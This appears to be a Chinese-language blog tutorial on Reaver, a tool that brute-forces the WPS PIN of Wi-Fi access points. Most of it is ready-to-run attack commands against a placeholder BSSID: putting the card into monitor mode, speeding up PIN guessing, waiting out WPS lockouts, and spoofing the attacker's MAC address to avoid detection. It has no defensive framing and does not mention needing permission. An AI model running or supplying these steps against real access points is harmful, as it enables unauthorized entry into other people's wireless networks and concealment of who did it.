reaver-wps
来源:互联网 发布:ubuntu 清空目录 编辑:程序博客网 时间:2024/05/01 14:13
概述
Reaver是暴力破解接入点PIN码的一种工具。这里简单说明,PIN码是8位数字,且第8位是由校验和,由前7位可以推出。而前7位又分为4和3两部分,所以暴力尝试最多10000+1000=11000次即可完成,破解所需的时间通常在2-5小时。
支持的网卡驱动
完全支持
- ath9k
- rtl8187
- carl19170
- ipw2000
- rt2800pci
- rt73usb
部分支持
- ath5k
- iwlagn
- rtl2800usb
- b43
不支持
- iwl4965
- RT3070L
- Netgear WG111v3
安装
Reaver只支持linux平台,需要libpcap和libsqlite库,可以下命令编译安装:
$ ./configure$ make# make install
卸载删除可使用命令;
# make distclean
命令参数
- 一般情况下,reaver需要的参数只有接口名和目标接入点的BSSID(MAC地址):
# reaver -i mon0 -b 00:01:02:03:04:05
- 如果没有明确指定,reaver会自动识别目标接入点的信道和网络名(前提是接入点没有隐藏SSID)。可用如下命令指定信道和网络名:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
- 默认情况下,如果接入点改变了信道,reaver也会相应地改变信道。然而当使用–fixed参数时,此功能会被禁用掉:
# reaver -i mon0 -b 00:01:02:03:04:05 --fixed
- 默认情况下的超时时间是5秒,使用以下命令则可以手动设置(最小为1秒):
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
- 默认的pin码尝试延迟间隔是1秒,这个时间可以用以下命令设定为任何非负数,0表示没有延迟:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
- 当发现一些可疑活动时,有些接入点会暂时锁定它们的WPS状态,通常小于5分钟。默认情况下,此时reaver会每隔315秒(5分15秒)检查一次状态,直到锁定状态解除再开始暴力破解。检查的时间间隔可以通过以下命令来调整任意一个非负值:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
- 使用-vv参数可以显示更多信息,将每个正在尝试的pin码显示出来:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
- 默认情况下,接收M5和M7 WPS反应的时间间隔是0.1秒,可通过下列命令调节(最大是1秒):
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
- 必要的时候,需要通过发送一个EAP FAIL的信息来关闭一个WPS会话,默认情况下此功能是不开启的,可通过以下命令开启:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
- 对每10个连续的unexpected WPS提示信息,会有一个warning。这可能是因为接入点限制了pin或者过载了,此时往往需要通过短时间的sleep来解决:
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
实战用法
基本用法
首先,开启monitor模式:
# airmon-ng start wlan0
使用reaver需要指定接入点MAC地址以及monitor接口名:
# reaver -i mon0 -b 00:01:02:03:04:05
或者使用-vv参数获得详细的进度信息:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
加速攻击
默认情况下,reaver的pin码尝试间隔为1秒,我们可以通过使用’-d 0‘参数来除去时间间隔。但是可能会使接入点出现问题:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
另一种加速攻击的方法是使用–dh-small。这个参数选项会使reaver尝试小的diffie-hellman密码,从而减轻接入点的计算负荷。
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC地址欺骗
有时我们可能需要隐藏自己的MAC地址,reaver用-mac参数来支持此功能。注意:改变虚拟的monitor接口的MAC地址没有什么用,必须要改变物理接口的MAC地址,如:
# ifconfig wlan0 down# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69# ifconfig wlan0 up# airmon-ng start wlan0# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
0 0
- reaver-wps
- Hacking WPA 2 Key using Reaver (WPS Bruteforce)
- 无线wifi-PJ-之在开启WPS下使用reaver
- wifislax14.0final reaver穷举PIN教程 wap,wps破解教程
- reaver使用方法
- reaver 使用方法
- Reaver参数表
- WPS
- wps
- WPS
- wps
- Reaver Open Source
- reaver 使用方法和技巧
- reaver使用相关
- Reaver 基本用法示例
- [Reaver] crack wireless AP
- reaver WPC进度文件解析
- WPS|wps去掉横线
- MvvmLight(四)消息通知Messenger
- 虚基类与虚继承
- iOS-浅谈runtime运行时机制02-runtime简单使用
- 在Ubuntu(Linux)上安装Android Studio
- Linux C语言程序设计(十六)——TCP/IP协议基本解析
- reaver-wps
- PowerDesigner中物理模型添加外键
- 未来5年中国GDP增速仍将保持在6%~7%高速发展状态
- JavaScript学习笔记6-单元测试框架之Jasmine
- android开发过程中的tips
- sqlite 索引
- 对收藏的《内存对齐》补充
- 信庭嵌入式工作室-嵌入式Linux漫谈之Linux系统
- DP水一水